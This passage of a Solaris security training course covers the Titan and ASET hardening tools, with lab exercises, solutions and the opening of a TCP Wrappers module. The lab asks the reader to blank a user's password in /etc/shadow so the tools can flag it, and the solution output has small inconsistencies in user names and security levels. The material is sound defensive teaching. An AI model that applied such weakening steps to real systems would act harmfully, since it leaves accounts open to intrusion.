telnet-banner.sh Sets BANNER="" in the /etc/default/telnetd file so that the Solaris OE version is not displayed before the login prompt.

userumask.sh Adds a umask of 022 for users in the /etc/skel and /etc files.

utmp.sh Checks the utmp and utmpx files to ensure that they are not world writable.


Note – Rerun the fix-modes.sh script whenever you add packages or patches. You should run this module on a regular basis using the cron utility, or at least after adding any vendor patches.


Configuring Titan

After installing Titan and configuring it for your host environment (by running the Titan-Config script), Titan is ready to use.

By default, Titan uses all of the installed modules. This is not appropriate for most systems, so you should create a configuration file which includes only the modules that you require.

Sample configuration files for a workstation (sample.Desktop), a server (sample.Server), and a firewall (sample.Firewall) are provided in Titan’s installation directory. Use these as a starting point to develop your own configuration files.

You specify the configuration file on the Titan command line by using the -c option. To use the desktop configuration file to verify your workstation’s security level, use:

# ./Titan -c sample.Desktop


Running Titan

When you have installed and configured Titan, you can run it in several modes:

● Introductory Mode – Run Titan with the -i option to get an information summary about each installed module, as follows:

# ./Titan -i

● Verify Mode – Run Titan with the -v option to get a security report from each installed module, as follows:

# ./Titan -v

● Fix Mode – Run Titan with the -f option to fix security weaknesses for each installed module, as follows:

# ./Titan -f


Creating a Titan Configuration

Running Titan in default mode using all modules is not suitable for most systems. Create your own configuration to use the Titan modules that are applicable to the hosts that you administer. You can create different configurations for different types of hosts, such as:

● Database servers

● Web servers

● File servers

● User workstations

● Firewalls

● Proxy servers


When you create your own Titan configuration, you must specify which mode you want each module to use. The following example configuration file verifies your host’s umask and BSM settings:

# more verify.config
add-umask.sh -v
bsm.sh -v

You can run Titan with this configuration file using:

# ./Titan -c verify.config

You need a separate configuration file to fix security problems:

# more fix.config
add-umask.sh -f
bsm.sh -f

You can run Titan with this configuration file by entering:

# ./Titan -c fix.config

When running Titan configuration scripts, the module output is saved to a log file in the log subdirectory of the Titan installation directory.

Note – You can run modules with the -v option and the -f option from the same configuration file, but this is not the standard practice.

Running a Single Module

You can run a single Titan module from the command line by specifying the path name of the module (all modules are in the bin/modules directory in the Titan installation directory) and the run mode. For example, to verify the settings for the sendmail program use:

# bin/modules/nuke-sendmail.sh -v


Writing Your Own Titan Modules

Titan provides a template which you can copy and edit to create your own modules. To create your own modules, you must be familiar with writing shell scripts.

Begin with the template for your system architecture, which is in Titan’s installation directory in a subdirectory of the arch directory. For the Solaris 8 OE:

arch/sol8sun4/src/stubs/skeleton

Copy this file to a working directory to make your changes, and add your script to the configuration files that you use.

The template file is fully described in the Frequently Asked Questions (FAQ) provided with Titan (docs/txt/FAQ.txt in the Titan installation directory).


Module Structure

The module template contains all the administration code for checking the Titan configuration and user command line. You only complete the three functions which are called for each of the possible run modes. These functions are:

● Introduction section – Intro() – Any text that you place between the “EOF_INTRO” keywords is echoed to the screen when the user starts the script with the -i option, as shown in Code 14-1.

Code 14-1 Titan Introduction Section

Intro() {
cat << EOF_INTRO
Add in the information on what the script does here
EOF_INTRO
}


● Verify section – Check() – Use this function when a Titan script is run in the -v verify mode. Look through the existing Titan scripts to see some of the ways that the Check() function checks the system. Every Check() function must write a “PASSES CHECK” or a “FAILS CHECK” message so that users can determine if a Titan fix is needed or has already been applied to the system. Code 14-2 shows an example.

Code 14-2 Titan Verify Section

Check() {
    if [ -f /etc/init.d/init.dmi ]; then
        echo " dmi daemon is enabled: FAILS CHECK"
        exit 1
    else
        echo " dmi doesn't start at boot time: PASSES CHECK"
    fi
}

● Fix section – Fix() – This function changes or modifies system files. The Fix() function is only invoked when the user specifically runs a Titan script with the -f flag. The Fix() function hardens the system and can be quite complex. Code 14-3 is an example Fix() function which moves and renames start-up files so that the dmi daemon no longer runs at system boot.

Code 14-3 Titan Fix Section

Fix() {
    if [ -f /etc/init.d/init.dmi ]; then
        echo " Saving /etc/init.d/init.dmi to /etc/init.d/init.dmi.ORIG"
        /bin/mv /etc/init.d/init.dmi /etc/init.d-init.dmi.ORIG.$$
        /bin/mv /etc/rc2.d/K77dmi /etc/rc2.d-K77dmi.ORIG.$$
        /bin/mv /etc/rc3.d/S77dmi /etc/rc3.d/S77dmi.ORIG.$$
        chmod 0100 /etc/init.d-init.dmi.ORIG.$$
        chmod 0100 /etc/rc2.d-K77dmi.ORIG.$$
        chmod 0100 /etc/rc3.d/S77dmi.ORIG.$$
        # $? here is the status of the last chmod only; the earlier mv and
        # chmod commands are not checked
        if [ $? -ne 0 ]; then
            echo " ERROR: Could not rename /etc/rc3.d/S77dmi ; exiting"
            exit 1
        else
            echo "Done ... "
        fi
    fi
}

These functions are the essential elements of a Titan script. After you write your script, copy or move your script to the Titan modules directory (bin/modules) and make it executable. When Titan is run with the -i, -v, or -f options, it runs all commands in the bin/modules directory that are:

● Plain files

● Executable

Running Titan runs your script. If you use configuration files, you must include your script name in the configuration file.

Note – Another way to configure Titan is to move all the unnecessary modules out of the bin/modules directory or to remove the executable permissions from the modules that you do not want to use.
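An added example of a complete module in this Intro/Check/Fix layout; it is not one of Titan’s own modules. It checks that a login profile sets a umask at least as strict as 027, writes the PASSES CHECK or FAILS CHECK message, and in fix mode rewrites or appends the umask line after saving the original with a .ORIG suffix as the Titan modules do. The module name umask-profile.sh and the TITAN_TARGET override (so the module can be tried on a copy of the file) are assumptions; it is written for POSIX sh and sed.

```shell
#!/bin/sh
# Added example (not one of Titan's modules): a module in the Intro/Check/Fix
# layout that verifies and, in fix mode, tightens the umask set in a login
# profile.  TITAN_TARGET is a hypothetical override so the module can be
# exercised on a copy of the file instead of the real /etc/profile.
TARGET_DEFAULT=/etc/profile
WANT_UMASK=027

Intro() {
cat << EOF_INTRO
  umask-profile.sh verifies that $TARGET_DEFAULT sets a umask at least as
  strict as $WANT_UMASK (no group write, nothing for others).  In fix mode
  it rewrites or appends the umask line; the original file is saved with
  a .ORIG suffix, as the other Titan modules do.
EOF_INTRO
}

# Print the value on the first active "umask NNN" line of the file, if any.
current_umask() {
    sed -n 's/^[[:space:]]*umask[[:space:]]*\([0-7][0-7]*\).*/\1/p' "$1" | head -n 1
}

# Succeed if the octal mask clears group write and every "other" bit,
# that is, if it masks at least what 027 masks.
umask_is_strict() {
    m=$(( 0$1 ))
    [ $(( (m & 027) == 027 )) -ne 0 ]
}

Check() {
    f=${TITAN_TARGET:-$TARGET_DEFAULT}
    u=$(current_umask "$f")
    if [ -z "$u" ]; then
        echo "  no umask set in $f: FAILS CHECK"
        return 1
    elif umask_is_strict "$u"; then
        echo "  umask $u in $f: PASSES CHECK"
        return 0
    else
        echo "  umask $u in $f is too permissive: FAILS CHECK"
        return 1
    fi
}

Fix() {
    f=${TITAN_TARGET:-$TARGET_DEFAULT}
    if Check > /dev/null; then
        echo "  $f already sets a strict umask; nothing to do"
        return 0
    fi
    # Keep a backup, then rewrite from the backup so a failed sed leaves it intact.
    cp -p "$f" "$f.ORIG.$$" || { echo "  ERROR: cannot back up $f; exiting"; return 1; }
    if [ -n "$(current_umask "$f")" ]; then
        sed "s/^\([[:space:]]*umask[[:space:]]*\)[0-7][0-7]*/\1$WANT_UMASK/" "$f.ORIG.$$" > "$f"
    else
        printf 'umask %s\n' "$WANT_UMASK" >> "$f"
    fi
    echo "  Set umask $WANT_UMASK in $f (original saved as $f.ORIG.$$)"
}

# Dispatch on the Titan run mode; with no argument, only print the usage.
case "$1" in
    -i) Intro ;;
    -v) Check ;;
    -f) Fix ;;
    "") echo "usage: $0 -i | -v | -f" ;;
    *)  echo "usage: $0 -i | -v | -f"; exit 1 ;;
esac
```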


Enhancing System Security Using ASET

The Solaris OE includes a software security guard for Sun systems called ASET. ASET is a set of tasks that detect potential security vulnerabilities and alter file access to improve system security.

Like the security measures of a building, ASET can provide levels of computer system security that depend on what the system is used for and how valuable or sensitive the data or programs that reside on the system are.

Note – ASET is an excellent tool when used as a periodic checklist of items to be examined and implemented, but it is only part of an overall plan to achieve system protection.


Using ASET Security Levels

ASET has three levels of security:

● Low – This level performs a number of checks and produces reports that outline potential security weaknesses. This level resets ownership and permissions of important system files to the default settings used when the system was first installed.

● Medium – This level modifies some system files to restrict system access if security risks are found. These modifications should not affect any system services.

● High – This level provides a more secure system by setting system parameters to minimal access permissions. Most system applications and commands should work normally, but security protections take precedence over any other system behavior.

By default, ASET runs at the lowest level of security.


The ASET utility performs seven tasks that make specific checks and, depending on the selected level of security, adjustments to system files and permissions to improve system security. Every ASET task includes the creation of a report noting possible weaknesses found and changes made. A description of each of the tasks is listed in Table 14-2.

Table 14-2 ASET Tasks

Task                                                                    Report Name
Check whether the system can be safely used as a firewall in a network  firewall.rpt
Check initialization files (.profile, .login, .cshrc) for umask and
PATH variable settings                                                  env.rpt
Check the contents of system configuration files such as the
/etc/default/login file                                                 sysconf.rpt
Check the consistency and integrity of /etc/passwd and /etc/group
entries                                                                 usrgrp.rpt
Verify appropriate system file permissions based on configurations in
the tune.* files                                                        tune.rpt
Examine owner, permissions, links, and size of important system files   cklist.rpt
Verify appropriate EEPROM security parameters                           eeprom.rpt


Running ASET Manually

To use the aset command, you must install the ASET (SUNWast) package, which is a default package for the Solaris 8 OE. The necessary scripts and directories usually reside in the /usr/aset directory, but you can install them elsewhere. The /usr/aset directory is not in the standard search path for the root user. The main script doing the work is /usr/aset/aset.

By default, the aset utility does not run automatically; it must be started by the superuser. The aset utility is usually run on a periodic basis, interactively or as a cron process.

To run the aset utility interactively at its lowest security level, type:

# /usr/aset/aset


To adjust the level of security described previously in this module, use the -l option and specify the level as a keyword:

● low – Low-level security (the same as running the command with no option)

● med – Medium-level security

● high – High-level security

To run aset interactively with the highest level of security, type:

# /usr/aset/aset -l high
/usr/aset/aset -p -l high
======= ASET Execution Log =======
ASET running at security level high
Machine = wallace; Current time = 0601_23:30
aset: Using /usr/aset as working directory
Executing task list ...
        firewall
        env
        sysconf
        usrgrp
...


To redirect the reports somewhere other than /usr/aset, use the -d option to specify the new directory, as follows:

# /usr/aset/aset -d ./aset_reports

The tasks that ASET performs are controlled by several scripts in the /usr/aset/tasks directory. There is one script for each task, with the same name as the tasks shown in Table 14-2 on page 14-28. You can modify the scripts to customize the actions of the task.

ASET behavior is controlled by the /usr/aset/asetenv script. You can modify this script to customize which ASET tasks should be run (if they are not all required). The firewall setup task, for example, disables the forwarding of IP packets and hides routing information from the external network. If you want to run ASET at high security but do not need firewall protection, comment out that task from the /usr/aset/asetenv file.


Restoring the System

Within the aset directory there is a restore script called:

# /usr/aset/aset.restore

Running this script restores the system to the state it was in before the aset command was run. Each task script has a corresponding .restore script which undoes the actions of the task script.

Monitoring Task Status

Depending on the size and speed of a system and your chosen level of security, it might take some time for ASET to complete its tasks and issue the reports. The aset program is usually run late at night when the host system is idle.

When running ASET interactively, monitor the progress of the checks to make sure that they have completed before attempting to interpret the data from the reports. To monitor the checks, use the taskstat command. In Code 14-4, the output from the taskstat command indicates that the ASET checks are not complete.

Code 14-4 The taskstat Command

# /usr/aset/util/taskstat
Checking ASET tasks status ...
Task firewall is done.
Task env is done.
Task sysconf is done.
Task usrgrp is done.
The following tasks are done:
        firewall
        env
        sysconf
        usrgrp
The following tasks are not done:
        tune
        cklist
        eeprom

The taskstat information is stored in the taskstatus file in the directory where the reports are stored.


Running ASET Periodically

Although you can run ASET interactively, it is usually more effective to run ASET periodically from the cron utility. If you schedule ASET this way, it can report on possible security problems introduced during a normal work day.

To add an ASET entry to the root crontab file, use the -p option in addition to the required security level. By default, ASET runs every night at midnight.


The command shown in Code 14-5 runs ASET on a periodic basis using the highest level of security.

Code 14-5 Running ASET Periodically

# /usr/aset/aset -p -l high
/usr/aset/aset -p -l high
======= ASET Execution Log =======
ASET running at security level high
Machine = wallace; Current time = 0601_23:30
aset: Using /usr/aset as working directory
ASET execution scheduled through cron.

Change the PERIODIC_SCHEDULE environment variable in the /usr/aset/asetenv file to control how frequently ASET runs. The format of this variable mirrors the format of the scheduling information in crontab. The default entry in the asetenv file is:

# grep PERIODIC /usr/aset/asetenv
PERIODIC_SCHEDULE="0 0 * * *"

To change how often ASET is run, edit this line in the asetenv file to a new value and run the aset program with the -p option again. This updates the crontab file. Alternatively, you can edit the root crontab file using:

# crontab -e


Interpreting ASET Reports

Each of the seven tasks that the aset command performs creates a report file specific to that task. Each file ends with .rpt. When you run ASET, a new directory is created under the /usr/aset/reports directory. The directory name is a timestamp of when ASET was run. Each report subdirectory name has the following format:

MMdd_hh:mm

where MM, dd, hh, and mm are all two-digit numbers representing the report month, day, hour, and minute. For example:

1024_02:00

For convenience, a link directory called latest points to the last directory established by ASET.


You can view each of the seven task report files individually for details. Code 14-6 shows the contents of one of these report files.

Code 14-6 Example ASET Report

# more /usr/aset/report/latest/usrgrp.rpt
*** Begin User And Group Checking ***
Checking /etc/passwd ...
Checking /etc/shadow ...
Warning! Shadow file, line 1, no password:
alice::6445::::::
... end user check.
Checking /etc/group ...
... end group check.
*** End User And Group Checking ***

The security level you select and the health of the system determine the size and content of the report files. You should review each of them and decide whether adjustments should be made.

Confirming Security Improvements Using the aset Command

If you decide that adjustments to the system are required, make them and then run the aset command again to ensure that the reports change.

For example, even at the low level of security, you should not use a umask setting of 022 in the /etc/profile file. When you install ASET, the env task reports that this default setting in /etc/profile should be changed. When you change the umask from 022 to 027 in /etc/profile, you tighten security. When the env task is run again, the env.rpt file no longer reports the problem.

Interpreting and Configuring the tune.* Files

The tune.rpt task, which checks file ownership and permissions, is configured from the files in the /usr/aset/masters directory. For each level of security, there is a corresponding tune file: tune.low, tune.med, and tune.high.


If you do not like the default settings of the tune files, you can make adjustments to the appropriate tune files and run the tune task again to gain extra control of file permissions. Code 14-7 shows various entries from the tune.low file.

Code 14-7 The tune.low File

# more /usr/aset/masters/tune.low
# Tune list for level low
# Format:
# pathname                mode   owner  group  type
/                         02755  root   root   directory
/bin                      00777  root   bin    symlink
/sbin                     02775  root   sys    directory
/usr/sbin                 02775  root   bin    directory
/etc                      02755  root   sys    directory
/etc/chroot               00777  bin    bin    symlink
/etc/clri                 00777  bin    bin    symlink
/etc/crash                00777  root   sys    symlink
/etc/cron                 00777  root   sys    symlink
/etc/fsck                 00777  bin    bin    symlink
/etc/fuser                00777  bin    bin    symlink
/etc/halt                 00777  bin    bin    symlink
/etc/link                 00777  root   bin    symlink
/etc/mknod                00777  bin    bin    symlink
/etc/mount                00777  bin    bin    symlink
/etc/mnttab               00644  root   root   file
/etc/vfstab               00664  root   sys    file
/etc/passwd               00644  root   sys    file
/etc/shadow               00400  root   sys    file
/etc/nsswitch.conf        00644  root   sys    file
/etc/resolve.conf         00644  root   sys    file

The five fields on each line in the tune files are:

● The absolute path name of the file, directory, or symbolic link – You can use regular shell wildcard characters in the path name for multiple references.

● The octal representation of the file mode as 5 digits representing the file type (always 0), the SUID, SGID, and sticky bit execution modes, and rwx for user, group, and others. If the current setting is already more restrictive than the specified value, ASET does not loosen the permission settings. For example, if the mode is 00777, the permission does not change, because it is always less restrictive than the current setting.


● The user associated with the file – This must be a name rather than the numeric UID.

● The group associated with the file – This must be a name rather than the numeric GID.

● The file type – This value can be symlink for a symbolic link, directory for a directory, and file for all other file types.
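An added illustration, not ASET’s own code, of the five-field tune.* format and of the rule that ASET tightens but never loosens a mode. The mode it would apply is computed as the bitwise AND of the current mode and the tune entry, which is a reading of the rule as stated above rather than ASET’s published algorithm; the tune fragment and the current modes are constructed inline instead of being read from a live system, and only the mode field is applied (owner and group are validated but not changed).

```shell
#!/bin/sh
# Added example, not ASET's own code: parse entries in the tune.* layout and
# compute the mode the tune task would leave on a file under the rule that
# ASET never loosens permissions.  The tune fragment and the current modes
# are constructed inline so the example runs without touching a live system.

# Mode the tune task would apply, given the current mode and the tune entry's
# mode (octal strings): every bit the file does not already have is cleared
# (bitwise AND), so the result is never looser than the current setting.
tune_effective_mode() {
    printf '%05o\n' $(( 0$1 & 0$2 & 07777 ))
}

# Validate one tune entry (pathname mode owner group type) and print it
# tab-separated; returns 1 and reports on stderr for a malformed entry.
# set -f keeps a wildcard pathname from being expanded during splitting.
tune_parse_line() {
    set -f; set -- $1; set +f
    [ $# -eq 5 ] || { echo "tune: expected 5 fields, got $#: $*" >&2; return 1; }
    case $2 in
        [0-7][0-7][0-7][0-7][0-7]) ;;
        *) echo "tune: bad mode '$2' for $1" >&2; return 1 ;;
    esac
    for name in "$3" "$4"; do
        case $name in
            *[!0-9]*) ;;     # contains a non-digit: a name, as required
            *) echo "tune: owner/group must be a name, not '$name'" >&2; return 1 ;;
        esac
    done
    case $5 in
        symlink|directory|file) ;;
        *) echo "tune: bad type '$5' for $1" >&2; return 1 ;;
    esac
    printf '%s\t%s\t%s\t%s\t%s\n' "$1" "$2" "$3" "$4" "$5"
}

# Constructed tune fragment in the layout of Code 14-7.
TUNE_SAMPLE='# Tune list for level low
# pathname mode owner group type
/etc/passwd 00644 root sys file
/etc/shadow 00400 root sys file
/etc/cron 00777 root sys symlink
/sbin 02775 root sys directory'

# Current modes, constructed for the example; on a host they would come
# from ls -ld or find -perm.
CURRENT_MODES='/etc/passwd 00666
/etc/shadow 00644
/etc/cron 00777
/sbin 00755'

current_mode_of() {
    printf '%s\n' "$CURRENT_MODES" | awk -v p="$1" '$1 == p { print $2; exit }'
}

# Print "path current -> new" for every entry the tune task would tighten;
# comments are skipped and malformed entries are reported on stderr.
tune_report() {
    while IFS= read -r line; do
        case $line in ''|'#'*) continue ;; esac
        tune_parse_line "$line" > /dev/null || continue
        set -f; set -- $line; set +f
        cur=$(current_mode_of "$1")
        [ -n "$cur" ] || continue
        new=$(tune_effective_mode "$cur" "$2")
        [ "$new" = "$cur" ] || echo "$1 $cur -> $new"
    done <<EOF
$TUNE_SAMPLE
EOF
}

tune_report
```

With the constructed modes, /etc/passwd and /etc/shadow are tightened, /etc/cron (tune mode 00777) is left alone, and /sbin stays at 00755 because it is already stricter than 02775.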


Exercise: Hardening the System

In this module you complete the following tasks:

● Install and configure Titan

● Use Titan to report the security weaknesses on your system

● Create a custom Titan configuration

● Use ASET to run interactively in the low-security mode

● Configure ASET to run periodically

Preparation

Using a text editor such as vi, edit the /etc/shadow file and set the password for user alice to be blank.

Tasks

In the first of these exercises, you install and configure Titan, and then use Titan to report on security weaknesses on your system. Next you create a custom Titan configuration to check and update your system. Finally, you configure and use ASET to harden your system.

You are not required to finish all of the tasks in the time allocated by the instructor.

Task – Installing and Configuring Titan

To set up Titan:

1. Obtain the latest version of Titan from the download site listed in the “Additional Resources” on page 14-3. To speed up the practical exercise, a copy of the download file (Titan,v4_0ALPHA-9.tar) is included in the /usr/local/pkg directory.

Extract the contents of this archive into the /usr/local directory. It creates a subdirectory called Titan,v4.0ALPHA-9.


2. Read the documentation for Titan but do not follow the instructions yet. The documentation is in the docs/txt subdirectory. There are also HTML documents for reading with a browser such as Netscape in the docs/html subdirectory. Begin with the Tutorial-short file:

# cd /usr/local/Titan,v4.0ALPHA-9
# cd docs/txt
# more Tutorial-short

3. Configure Titan for your operating system by entering the following commands:

# cd /usr/local/Titan,v4.0ALPHA-9
# ./Titan-Config

4. Enter y (yes) when asked to make backups of the files Titan modifies, as shown below:

Titan can backup all of the files it modifies; This is recommended
NOTE: in the process of backing up files /etc/shadow as well as other
important files will be backed up. It is IMPORTANT that you keep this
backup SAFE, or delete it after you are sure Titan didn't do something
unwanted
proceed? y/n: y

The installation is now complete. Titan installs a file called Titan in the titan directory which is configured for the version of the Solaris OE that you are running.

Task – Using Titan to Report on Security Problems

Run Titan to get a security report for your system.


Task – Creating and Running a Titan Configuration

To set up Titan:

1. Study the sample configuration file sample.Desktop in the Titan configuration directory.

2. Follow the format of the sample file and create a configuration file which verifies the following (you can refer to the notes for the Titan modules you need to use):

a. Ensure that the root user owns all files in directories in the root search path.

b. Stop the sendmail program from running.

c. Create a standard /etc/issue message file.

d. Stop the telnet command from displaying the workstation information.

3. Run Titan with this configuration to verify whether the faults exist or not.

4. Create a similar configuration to fix the faults identified in step 2.

5. Run Titan to apply this configuration to your system. You must reboot your workstation to apply the sendmail change.

6. Verify that the changes have been made.

Task – Running ASET Interactively

To set up ASET:

1. Run the aset command using the low security option. The aset command should take only a minute or two to run.

2. Wait until the tasks are complete by monitoring ASET with the taskstat command.

3. View the ASET reports and rectify the problems identified in the reports to make your system more secure. Verify that the changes are correct by re-running ASET.

4. Restore the system to its original state prior to running ASET.


Task – Configuring ASET Periodically

In this exercise you configure the system to run the ASET utility periodically. But before doing so, you must customize one of the task scripts. This requires some basic programming skills.

Normally, the aset command should be run late at night when the system load is light. For this exercise you configure aset to run a few minutes after the time you begin this exercise.

1. Note the time of day by running the desktop clock tool or running the date command on the command line.

2. Update the PERIODIC_SCHEDULE variable definition in the /usr/aset/asetenv file to run ASET five minutes from now. Schedule ASET to run periodically.

3. Check the reports produced by ASET.

4. Restore the system to its original state prior to running ASET.


Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following paragraphs describe the Solaris OE commands necessary to solve the problems posed in the exercises for this module.

Installing and Configuring Titan

There are no solutions to this task.

Using Titan to Report on Security Problems

Run Titan to get a security report for your system.

Run Titan in verify mode and save the output to a file. For example:

# cd /usr/local/Titan,v4.0ALPHA-9
# ./Titan -v >/tmp/titan.log
# more /tmp/titan.log

Creating and Running a Titan Configuration

1. Study the sample configuration file sample.Desktop in the titanconfiguration directory.

# cd /usr/local/Titan,v4.0ALPHA-9# more sample.Desktop

2. Follow the format of the sample file and create a configuration filewhich fixes the following (you can refer to the notes for the Titanmodules you need to use):

a. Ensure that the root user owns all files in directories in the root search path. Stop the sendmail program from running.

b. Create a standard /etc/issue message file.

c. Stop the telnet program from displaying the workstation information.

# vi verify.conf
rootchk.sh -v
nuke-sendmail.sh -v
create-issue.sh -v
telnet-banner.sh -v

3. Run Titan with this configuration to verify whether the faults exist.

# ./Titan -c verify.conf

Run Titan with this configuration, and observe the FAILS CHECK messages that indicate that the Titan changes have not been applied.

4. Create a similar configuration to fix the faults identified in Step 2.

# vi fix.conf
rootchk.sh -f
nuke-sendmail.sh -f
create-issue.sh -f
telnet-banner.sh -f

5. Run Titan to apply this configuration to your system. You must reboot your workstation to apply the sendmail change.

# ./Titan -c fix.conf
# init 6

6. Verify that the changes have been made.

a. Check the file permissions of directories such as /usr/bin and /usr/sbin.

# ls -al /usr/bin /usr/sbin | more

b. Try to use the telnet command to connect to port 25, and verify that the connection is refused.

# telnet localhost 25
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused

c. Use the telnet command to connect to your system, and verify that the output does not identify the host system and includes the standard message in the /etc/issue file.

# telnet localhost
Trying ::1...
Connected to localhost.
Escape character is '^]'.
########################################################################
# This system is for the use of authorized users only.                 #
# Individuals using this computer system without authority, or in      #
# excess of their authority, are subject to having all of their        #
# activities on this system monitored and recorded by system           #
# personnel.                                                           #
#                                                                      #
# In the course of monitoring individuals improperly using this        #
# system, or in the course of system maintenance, the activities       #
# of authorized users may also be monitored.                           #
#                                                                      #
# Anyone using this system expressly consents to such monitoring       #
# and is advised that if such monitoring reveals possible              #
# evidence of criminal activity, system personnel may provide the      #
# evidence of such monitoring to law enforcement officials.            #
########################################################################
login:

d. Run Titan again with the verify configuration, and observe the PASSES CHECK messages that indicate that the Titan changes have been applied.

# ./Titan -c verify.conf

Running ASET Interactively

1. Run the aset command using the low security option. The aset command should take only a minute or two to run.

# /usr/aset/aset -l low
======= ASET Execution Log =======
ASET running at security level low
Machine = wallace; Current time = 0602_15:06
aset: Using /usr/aset as working directory

Executing task list ...
firewall
env
sysconf
usrgrp
tune
cklist
eeprom

All tasks executed. Some background tasks may still be running.

2. Wait until the tasks are complete by monitoring ASET with the taskstat command:

# /usr/aset/util/taskstat
Checking ASET tasks status ...
Task firewall is done.
Task env is done.
Task sysconf is done.
Task usrgrp is done.
Task tune is done.
Task cklist is done.
Task eeprom is done.

The following tasks are done:
firewall
env
sysconf
usrgrp
tune
cklist
eeprom

All tasks have completed.

3. View the ASET reports, and rectify the problems identified in the reports to make your system more secure.

# cd /usr/aset/reports/latest
# cat env.rpt
*** Begin Environment Check ***

Warning! umask set to umask 022 in /etc/profile - not recommended.

*** End Environment Check ***
# cat usrgrp.rpt
*** Begin User And Group Checking ***

Checking /etc/passwd ...
Checking /etc/shadow ...
Warning! Shadow file, line 12, no password:
fred::10379::::::
... end user check.
Checking /etc/group ...
... end group check.
*** End User And Group Checking ***

The files indicate that /etc/profile must have the umask command changed, and that there is no password for user fred in the /etc/shadow file. Make the changes to the files that were noted in the previous step.

Verify that the changes are correct by running ASET again:

# /usr/aset/aset -l low
# cat env.rpt
...
# cat usrgrp.rpt

4. Restore the system to its original state prior to running ASET:

# /usr/aset/aset.restore
aset.restore: beginning restoration ...

Executing /usr/aset/tasks/firewall.restore
.....................
Resetting security level from low to null.

aset.restore: restoration completed.

Configuring ASET Periodically

1. Note the time of day by running the desktop clock tool or running the date command on the command line:

# date
Tue May 6 10:12:32 MDT 2001

2. Update the PERIODIC_SCHEDULE variable definition in the /usr/aset/asetenv file to run ASET five minutes from now:

# vi /usr/aset/asetenv
PERIODIC_SCHEDULE="17 10 * * *"

Schedule ASET to run periodically:

# /usr/aset/aset -p -l low
======= ASET Execution Log =======

ASET running at security level low

Machine = wallace; Current time = 1102_10:13

aset: Using /usr/aset as working directory
ASET execution scheduled through cron.

3. Check the reports produced by ASET:

# /usr/aset/util/taskstat

Note – If you run the taskstat command too soon, you get the report for the last run of ASET. You must wait for the cron utility to schedule the new ASET report.

# /usr/aset/util/taskstat
Checking ASET tasks status ...
Task firewall is done.
Task env is done.
Task sysconf is done.
Task usrgrp is done.
Task tune is done.
Task cklist is done.
Task eeprom is done.

The following tasks are done:
firewall
env
sysconf
usrgrp
tune
cklist
eeprom

All tasks have completed.
# cd /usr/aset/reports/latest
# more *.rpt

4. Restore the system to its original state prior to running ASET:

# /usr/aset/aset.restore
aset.restore: beginning restoration ...

Executing /usr/aset/tasks/firewall.restore

..................
usrgrp.restore completed.

Descheduling ASET from crontab file...
The following is the ASET schedule entry to be
deleted:
17 10 * * * /usr/aset/aset -l med -d /usr/aset
Proceed to deschedule: (y/n) y

Resetting security level from med to null.

aset.restore: restoration completed.

Module 15

Authenticating Network Services

Objectives

Upon completion of this module, you should be able to:

● Explain how to authenticate network clients

● Install and configure Transmission Control Protocol (TCP) Wrappers

● Monitor the use of telnet, file transfer protocol (FTP), and other utilities with TCP Wrappers

● Use TCP Wrappers to control network access to the system

Relevance

Discussion – The following questions are relevant to understanding authentication of network connections:

● Can you restrict access to your network to authorized clients only?

● Can you log all network accesses?

● Can you send immediate warnings (using pagers or other mechanisms) when an invalid client attempts to access a network service?

Additional Resources

Additional resources – The following references can provide additional details on the topics discussed in this module:

● Garfinkel, Simson, and Spafford, Gene. Practical UNIX & Internet Security. O’Reilly & Associates, Inc. 1996.

● Online manual pages for hosts_access(5), inetd.conf(4), and syslog.conf(4)

● Solaris OE Answerbook 2.

● TCP Wrappers ported to Solaris OE 2.x; [http://www.sunfreeware.com]

Understanding Network Authentication

TCP/IP is controlled on the Solaris OE by a complex system of daemons. These daemons have developed over many years and provide a robust and powerful way to configure network services. The services are powerful and it is easy to make a mistake in configuration, or to forget to configure a service.

Most network services have minimal or no authentication. The telnet and FTP services only require a valid user name and password, whereas Anonymous FTP and the Finger daemon allow access to any client.

Logging is practically non-existent for most network services.

When considering security, these authentication and logging weaknesses are a major problem with the default UNIX network services. You need logging to establish a good audit trail when tracking break-ins and attempted break-ins. You also need some form of client authentication and access control. Many sites would like to run an Anonymous FTP service for their own users (remote and local) but deny access to all other clients.

Consider how useful it would be to only allow Anonymous FTP for clients in your own domain (sun.com for example).

From an administrative point of view, if auditing and host access control could be applied in a logical and consistent manner, then network security could be greatly improved.

The solution is to install TCP Wrappers.

Using TCP Wrappers

TCP Wrappers (tcpd) are small daemon programs that wrap around the standard network daemons. You can install them without changing existing network software programs. The Wrappers report the name of the client host and the requested service using the Syslog program.

TCP Wrappers do not exchange information with the client or server applications. A small initialization overhead is required to authenticate the host and log the connection, but Wrappers impose no overhead on the communications between the client and server applications.

TCP Wrappers’ functionality includes transparent logging for TCP-based network daemons including tftp, exec, ftp, telnet, rlogin, rsh, and finger. TCP Wrappers provide a level of security above those of the basic operating environment.

Note – TCP Wrappers do not provide full security against unwelcome visitors. A further level of security is provided by IP filtering and firewalls.

TCP Wrappers surround the service daemon with another program called tcpd which logs the incoming request and optionally provides access control, allowing or denying the connection depending on where the request originates from.

The /etc/inetd.conf configuration file is changed so that the inetd program starts the wrapped version of each network daemon. For example, to service an incoming FTP connection, /usr/sbin/tcpd is started instead of /usr/sbin/in.ftpd. If tcpd allows the incoming request, it starts the in.ftpd program; if it denies the incoming request, it logs the attempt, but otherwise ignores the request.

Note – The TCP Wrappers package was written by Wietse Venema and was formerly called log_tcp. Some sites still list it by that name.

Obtaining and Installing TCP Wrappers

TCP Wrappers can be obtained in two forms:

● As an SVR4 package from http://www.sunfreeware.com .

● As a standard tar package which can be compiled for most UNIX platforms including Linux.

TCP Wrappers can be downloaded from most archive sites on the Web including ftp://playground.sun.com/pub/casper.

The SVR4 package installs TCP Wrappers in the /usr/local directory, putting the tcpd program in the /usr/local/sbin directory and the manual pages in the /usr/local/man/man* directory. Additional documentation is installed in the /usr/local/docs/tcp_wrappers directory.

Configuring TCP Wrappers

TCP Wrappers can be configured in one of two ways:

● Hidden – This involves replacing the network service daemons. This method might sound appealing, but it places an extra load on the administrator when you update the operating system. TCP Wrappers must be reconfigured after performing an upgrade or applying patches.

● Visible – This involves changing the /etc/inetd.conf file. This approach is less secure than the hidden method because the /etc/inetd.conf file can be viewed by any user. However, this method is often preferred because you only need to change one file.

